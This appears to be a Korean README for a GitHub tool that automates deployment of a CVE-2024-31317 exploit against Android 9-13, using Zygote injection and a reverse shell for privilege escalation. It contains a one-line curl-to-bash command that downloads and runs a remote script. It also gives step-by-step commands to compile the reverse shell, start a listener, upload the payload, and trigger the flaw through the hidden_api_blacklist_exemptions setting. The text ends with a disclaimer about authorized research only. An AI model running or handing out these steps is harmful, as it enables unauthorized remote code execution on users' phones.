
Android 9-13에서 CVE-2024-31317 PoC를 자동 배포하여 Zygote 주입과 리버스 셸 실행을 통한 권한 상승을 가능하게 하는 도구입니다.
Android 9~13 기기를 대상으로 하는 CVE-2024-31317 개념 증명(PoC) 악용 코드 배포 도구입니다.
CVE-2024-31317-PoC-Deployer는 CVE-2024-31317 취약점 악용에 필요한 모든 파일을 신속하게 생성하고 구성하는 자동화 배포 스크립트입니다. 이 취약점은 Android 9~13 기기에 영향을 미치며, Zygote 프로세스를 통한 권한 상승 및 임의 코드 실행을 허용합니다.
reverse_shell.c - C 언어로 구현된 리버스 셸 프로그램payload.txt - 특수하게 제작된 취약점 악용 페이로드compile.sh - 자동 컴파일 스크립트README.txt - 상세 사용 설명CVE-2024-31317.txt - 취약점 기술 분석 문서원격 배포 스크립트 실행:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
리버스 셸 컴파일:
sh compile.sh
리버스 셸 리스너 실행:
sh reverse_shell
payload.txt를 대상 기기의 /data/local/tmp/에 업로드합니다xxx.xxx.xxx를 리스너 서버 IP로 교체합니다am force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
이 도구는 합법적인 보안 테스트 및 연구 목적으로만 사용됩니다. 사용 전에 반드시 대상 시스템의 명시적 승인을 받아야 합니다. 승인되지 않은 사용은 법률을 위반할 수 있습니다. 개발자는 어떠한 오용 행위에 대해서도 책임을 지지 않습니다.
이 프로젝트는 MIT 라이선스를 사용합니다 - 자세한 내용은 LICENSE 파일을 참조하십시오.